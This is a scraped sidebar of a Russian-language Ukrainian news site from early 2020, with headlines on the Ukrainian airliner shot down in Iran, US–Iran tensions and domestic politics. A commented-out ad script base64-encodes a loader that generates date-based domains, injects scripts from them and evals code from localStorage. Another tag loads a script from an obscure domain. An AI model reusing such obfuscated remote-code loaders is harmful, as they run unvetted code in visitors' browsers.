"Закрытые" версии крушения самолета, военная мощь в Черном море и ценовые рекорды</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4789348"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/901-vojna-poka-otmenyaetsya-shtaty-dali-zadnyuyu">Война пока отменяется: Штаты дали заднюю на реках вавилонских</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4789231"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/801-itogi-dnya-katastrofa-samoleta-mau-v-irane-gnev-trampa-i-finansovaya-revolyuciya">Итоги дня: Катастрофа самолета МАУ в Иране, гнев Трампа и "историческая денежная революция"</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4789093"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/701-itogi-dnya-ssha-protiv-irana-gromkoe-zayavlenie-estonii-gastrolyory-rf-v-ukraine">Итоги дня: Жестокие игры США и Ирана, громкое заявление Эстонии и гастролёры РФ в Украине</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4788927"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/301-itogi-dnya-predchuvstvie-bolshoj-vojny-syurpriz-belarusi-dlya-rf-i-novejshij-bespilotnik-vsu">Итоги дня: Предчувствие большой войны, сюрприз Беларуси для РФ и новейший беспилотник ВСУ</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4788897"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/201-itogi-dnya-povyshenie-pensionnogo-vozrasta-deokkupaciya-kryma-i-priblizhenie-ekstremalnyx-morozov">Итоги дня: Повышение пенсионного возраста, деоккупация Крыма и приближение экстремальных морозов</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4788816"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/101-itogi-dnya-smertnye-deputaty-dengi-za-korrupcionera-i-novogodnie-priklyucheniya-ukraincev">Итоги дня: Смертные депутаты, деньги за коррупционера и новогодние приключения украинцев</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4788808"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/3112-prazdnichnye-itogi-dnya-novyj-god-v-raznyx-stranax-mira-celi-na-2020-i-samye-dobrye-novosti">Праздничные итоги дня: Новый год в разных странах мира, цели на 2020 и самые добрые новости</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4788762"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/3012-itogi-dnya-putinskij-gazoprovod-v-gluxom-ugle-bomba-bajdena">Итоги дня: Путинский газопровод в глухом угле, бомба Байдена и наглое требование России</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4788478"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2712-itogi-dnya-pervyj-shtraf-za-krym-i-pike-dollara-i-problemy-severnogo-potoka-2">Итоги дня: Первый штраф за Крым, пике доллара и проблемы "Северного потока-2"</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><div
id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script><div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/801-iran-nanyos-vtoruyu-volnu-udarov-po-amerikanskim-obektam-v-irake"><img width="142" height="88" alt="Иран нанёс вторую волну ударов по американским объектам в Ираке" src="https://enovosty.com/wp-content/uploads/2020/01/thumbnail-tw-20200108090458-2840.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/801-iran-nanyos-vtoruyu-volnu-udarov-po-amerikanskim-obektam-v-irake">Иран нанёс вторую волну ударов по американским объектам в Ираке</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/801-v-seti-smeyutsya-nad-morskimi-lvami-kotorye-popytalis-ugnat-kater-video"><img width="142" height="88" alt="В Сети смеются над морскими львами, которые попытались угнать катер" src="https://enovosty.com/wp-content/uploads/2020/01/1578082782_sealion-joyride-tzr-780x501-e1578480956992.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/801-v-seti-smeyutsya-nad-morskimi-lvami-kotorye-popytalis-ugnat-kater-video">В Сети смеются над морскими львами, которые попытались угнать катер</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/801-pozhary-v-avstralii-izvestnyj-akter-pozhertvoval-na-borbu-so-stixiej-1-million-dollarov-video"><img width="142" height="88" alt="Пожары в Австралии: известный актер пожертвовал на борьбу со стихией 1 миллион долларов" src="https://enovosty.com/wp-content/uploads/2020/01/5e14b49ac5690-e1578419313957.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/801-pozhary-v-avstralii-izvestnyj-akter-pozhertvoval-na-borbu-so-stixiej-1-million-dollarov-video">Пожары в Австралии: известный актер пожертвовал на борьбу со стихией 1 миллион долларов</a></div></td></tr><tr><td class="view"><span><i></i>2562</span></td><td class="view"><span><i></i>2347</span></td><td class="view last"><span><i></i>1272</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/801-tramp-otstupil-gotovy-k-miru-video-zayavleniya"><img width="142" height="88" alt="Трамп отступил: США готовы к миру" src="https://enovosty.com/wp-content/uploads/2020/01/trump.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/801-tramp-otstupil-gotovy-k-miru-video-zayavleniya">Трамп отступил: США готовы к миру</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/801-megan-markl-vyshla-v-svet-v-izyskannom-obraze-video"><img width="142" height="88" alt="Меган Маркл вышла в свет в изысканном образе" src="https://enovosty.com/wp-content/uploads/2020/01/mugan.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/801-megan-markl-vyshla-v-svet-v-izyskannom-obraze-video">Меган Маркл вышла в свет в изысканном образе</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/901-v-abxazii-vspyxnul-protest-lyudi-vzyali-shturmom-administraciyu-prezidenta"><img width="142" height="88" alt="В Абхазии вспыхнул протест: люди взяли штурмом администрацию президента" src="https://enovosty.com/wp-content/uploads/2020/01/screenshot54.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/901-v-abxazii-vspyxnul-protest-lyudi-vzyali-shturmom-administraciyu-prezidenta">В Абхазии вспыхнул протест: люди взяли штурмом администрацию президента</a></div></td></tr><tr><td class="view"><span><i></i>916</span></td><td class="view"><span><i></i>796</span></td><td class="view last"><span><i></i>752</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div> <div id='div-gpt-ad-1516280158772-0' style='height:60px; width:468px;'></div><script type='text/javascript'>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1516280158772-0'); });</script></br><div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/901-dannye-kanadskoj-razvedki-ukrainskij-samolet-sbila-raketa-zemlya-vozdux-tryudo" rel="bookmark">Данные канадской разведки: Украинский самолет сбила ракета "земля-воздух" - Трюдо</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/901-versiya-terakta-na-bortu-boinga-ili-vzryva-zenitnoj-rakety-vesma-veroyatna-istochnik" rel="bookmark">Версия теракта на борту "Боинга" или взрыва зенитной ракеты весьма вероятна - источник</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/801-butusov-otkaz-peredat-chernye-yashhiki-budet-dokazatelstvom-prichastnosti-vlastej-irana-k-atake-na-ukrainskij-samolyot" rel="bookmark">Отказ передать черные ящики будет доказательством причастности властей Ирана к атаке на украинский самолёт - Бутусов</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_politics/full/2810-poziciya-ukrainy-otnositelno-bojkota-zasedanij-pase-yavlyaetsya-pravilnoj-musienko" rel="bookmark">Позиция Украины относительно бойкота заседаний ПАСЕ является правильной, - Мусиенко</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_society/full/1908-rossiya-mozhet-pribegnut-k-eskalacii-i-bolee-shirokomasshtabnym-voennym-dejstviyam-protiv-ukrainy-musienko" rel="bookmark">Россия может прибегнуть к эскалации и широкомасштабным военным действиям против Украины, - Мусиенко</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_society/full/2006-aleksandr-musienko-rasskazal-o-vliyanii-pomoshhi-ssha-na-situaciyu-na-donbasse" rel="bookmark">Александр Мусиенко рассказал о влиянии финансовой помощи США на ситуацию на Донбассе</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_politics/full/2205-aleksandr-musienko-rasskazal-pro-vliyanie-dosrochnyx-parlamentskix-vyborov-na-situaciyu-na-fronte" rel="bookmark">Александр Мусиенко рассказал про влияние досрочных парламентских выборов на ситуацию на фронте</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/ekonomika/full/1109-realistichnyj-ili-populistskij-kakim-budet-gosudarstvennyj-byudzhet-2019" rel="bookmark">Реалистичный или популистский: каким будет государственный бюджет-2019?</a><br /></td> </tr><tr></tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><!--<div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script>
--><div id="WHwvwcq55RuJtgZm5orj" data-type="0" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'hvnwoeo.pro';</script><script src="//hvnwoeo.pro/eXu/EjSt.js" ></script><br><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4349822"><a href="https://enovosty.com/armiya/full/332-zenitnyj-raketnyj-kompleks-tor" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/04/tor-m2e_2_edit-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/04/tor-m2e_2_edit-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/04/tor-m2e_2_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/04/tor-m2e_2_edit.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/332-zenitnyj-raketnyj-kompleks-tor" >Зенитный ракетный комплекс «Тор»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4383049"><a href="https://enovosty.com/armiya/full/661-bronetransporter-caiman-ssha" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/08/Caiman-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/08/Caiman-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/08/Caiman-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/08/Caiman.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/661-bronetransporter-caiman-ssha" >Бронетранспортер Caiman (США)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4387519"><a href="https://enovosty.com/armiya/full/641-samolet-istrebitel-bae-harrier-ii-gr5-gr7-gr9-velikobritaniya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/09/GR7-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/09/GR7-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/09/GR7-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/09/GR7.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/641-samolet-istrebitel-bae-harrier-ii-gr5-gr7-gr9-velikobritaniya" >Самолет истребитель BAE Harrier II GR5 / GR7 / GR9 (Великобритания)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4450156"><a href="https://enovosty.com/armiya/full/663-bronetransporter-type-96-yaponiya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/05/Type_96-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/05/Type_96-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/05/Type_96-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/05/Type_96.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/663-bronetransporter-type-96-yaponiya" >Бронетранспортер Type 96 (Япония)</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости общества</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '77095', 77095, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '77095', 77095, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '77095', 77095, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_society/full/501-v-ukraine-reshili-postavit-pamyatnik-bandere-v-70-km-ot-rossijskoj-granicy">В Украине решили поставить памятник Бандере в 70 км от российской границы (5402)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/901-kievskaya-shkolnica-napisala-pismo-korolevskoj-seme-belgii-i-poluchila-otvet-foto">Киевская школьница написала письмо королевской семье Бельгии и получила ответ (ФОТО) (4491)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/601-kak-pravilno-provesti-svyatvecher-simvoly-tradizii-rozhdestva">Как правильно провести Святой вечер: символы и традиции Рождества (4007)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/901-shhenki-vpervye-uvidevshie-sneg-pokorili-set-svoej-neposredstvennostyu-foto">Щенки, впервые увидевшие снег, покорили Сеть своей непосредственностью (ФОТО) (2820)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/112-v-ukraine-vvedut-edinyj-nomer-ekstrennyx-sluzhb">В Украине введут единый номер экстренных служб "112" (2630)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/801-sinoptiki-poobeshhali-ukraincam-novuyu-volnu-potepleniya">Синоптики пообещали украинцам новую волну потепления (2549)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/901-v-irane-obnaruzheny-dokazatelstva-popadaniya-rakety-9m331-v-ukrainskij-passazhirskij-samolet">В Иране обнаружены доказательства попадания ракеты 9М331 в украинский пассажирский самолет (2210)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/701-nova-radist-stala-pesni-na-ukrainskom-zazvuchali-v-sevastopole-vo-vremya-rozhdestvenskoj-sluzhby">«Нова радість стала»: песни на украинском зазвучали в Севастополе во время рождественской службы (1916)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/401-ukrainskie-pochtovye-marki-priznany-luchshimi-v-evrope-foto">Украинские почтовые марки признаны лучшими в Европе (ФОТО) (1735)</a></h3><h3 class="press"><a href="https://enovosty.com/news_society/full/901-konec-gazovoj-epopei-chto-kroetsya-za-dogovorom-po-tranzitu-anti-colorados">Конец газовой эпопеи: что кроется за договором по транзиту, - Anti-colorados (1516)</a></h3></div> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4412513"><a href="https://enovosty.com/person/full/141-yaresko-natalya" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/12/yaresko-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/12/yaresko-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/12/yaresko.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/141-yaresko-natalya" >Наталья<br /> ЯРЕСЬКО</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4417297"><a href="https://enovosty.com/person/full/864-pivovarskij-andrej" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/12/pivovarskiy-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/12/pivovarskiy-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/12/pivovarskiy.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/864-pivovarskij-andrej" >Андрей<br /> ПИВОВАРСКИЙ</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4427625"><a href="https://enovosty.com/person/full/471-shokin-viktor-nikolaevich-generalnyj-prokuror-ukrainy" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/02/shokin-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/02/shokin-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/02/shokin.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/471-shokin-viktor-nikolaevich-generalnyj-prokuror-ukrainy" >Виктор<br /> ШОКИН</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4629623"><a href="https://enovosty.com/person/full/2007-zagorij-gleb" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2017/07/gleb_zagorij-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2017/07/gleb_zagorij-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2017/07/gleb_zagorij.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/2007-zagorij-gleb" >Глеб<br /> ЗАГОРИЙ</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news_society/full/901-kievskaya-shkolnica-napisala-pismo-korolevskoj-seme-belgii-i-poluchila-otvet-foto">Киевская школьница написала письмо королевской семье Бельгии и получила ответ (ФОТО) (4492)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/901-morskie-aviatory-otognali-ot-ukrainskogo-poberezhya-korabl-shpion-fsb">Морские авиаторы отогнали от украинского побережья корабль-шпион ФСБ (3857)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/901-v-ops-group-dopustili-chto-samolet-mau-byl-sbit">В OPS GROUP допустили, что самолет МАУ был сбит (3652)</a></p><p class="press"><a href="https://enovosty.com/news_kiev/full/901-v-kieve-obnaruzhili-razgulivayushhego-po-zasnezhennym-ulicam-losya">В Киеве обнаружили разгуливающего по заснеженным улицам лося (3639)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/901-shhenki-vpervye-uvidevshie-sneg-pokorili-set-svoej-neposredstvennostyu-foto">Щенки, впервые увидевшие снег, покорили Сеть своей непосредственностью (ФОТО) (2821)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/901-v-irane-obnaruzheny-dokazatelstva-popadaniya-rakety-9m331-v-ukrainskij-passazhirskij-samolet">В Иране обнаружены доказательства попадания ракеты 9М331 в украинский пассажирский самолет (2213)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/901-kanadskie-razvedchiki-sdelali-gromkoe-zayavlenie-o-krushenii-ukrainskogo-boinga">Канадские разведчики сделали громкое заявление о крушении украинского Боинга (2178)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/901-posadili-na-unitaz-i-unizili-v-sirii-volna-vozmushhenij-posle-vstrechi-putina-i-asada">Посадили на "унитаз" и унизили: В Сирии волна возмущений после встречи Путина и Асада (1821)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/901-elizaveta-ii-otreagirovala-na-reshenie-princa-garri-i-megan-markl-pereexat-iz-britanii">Елизавета II отреагировала на решение принца Гарри и Меган Маркл переехать из Британии (1743)</a></p><p class="press"><a href="https://enovosty.com/news_politics/full/901-skandal-s-mitroshinoj-blogersha-rasskazala-chem-zakonchilsya-skandal">Скандал с Митрошиной: Блогерша рассказала, чем закончилась история в Украине (1626)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div id="adriver_banner_C1"></div><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/912-pochemu-pered-remontom-nuzhen-dizajn-proekt">Почему перед ремонтом нужен дизайн-проект?</a></p><p class="press"><a href="https://enovosty.com/publications/full/2810-investiciyam-zdes-ne-mesto">Инвестициям здесь не место</a></p></div><div id='admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'></div><script type="text/javascript">admixerML.fn.push(function () { admixerML.display('admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069'); });</script><div class="rightsidbaranalitika_1" style="background-color:#ebf0f4; margin-top: 10px; margin-bottom: 15px;"> <a href="https://enovosty.com/society/full/2312-solnce-i-more-letnij-otdyx-zimoj" title="Солнце и море: Летний отдых зимой" > <img width="300" height="200" src="https://enovosty.com/wp-content/uploads/2019/12/cover2_ed-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/12/cover2_ed-300x200.jpg 300w, https://enovosty.com/wp-content/uploads/2019/12/cover2_ed-112x75.jpg 112w, https://enovosty.com/wp-content/uploads/2019/12/cover2_ed.jpg 460w" sizes="(max-width: 300px) 100vw, 300px" /> </a><p class="entry-title td-module-title" style="text-align: left;padding: 7px;margin: 0;font: 700 12.5px Arial,Helvetica,sans-serif;"><a href="https://enovosty.com/society/full/2312-solnce-i-more-letnij-otdyx-zimoj" style="line-height: 1.1;" rel="bookmark" title="Солнце и море: Летний отдых зимой">Солнце и море: Летний отдых зимой</a></p></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news-auto/full/801-ukraincy-dolzhny-zaplatit-nalog-za-mashiny-za-chto-mogut-zabrat-i-komu-pridet-platezhka">Украинцы должны заплатить налог за машины: за что могут забрать и кому придет платежка (14459)</a></p><p class="press"><a href="https://enovosty.com/news_kiev/full/501-voditelej-nachnut-shtrafovat-za-narushenie-pdd-adresa-sistem-videofiksacii">Водителей начнут штрафовать за нарушение ПДД: адреса систем видеофиксации (10597)</a></p><p class="press"><a 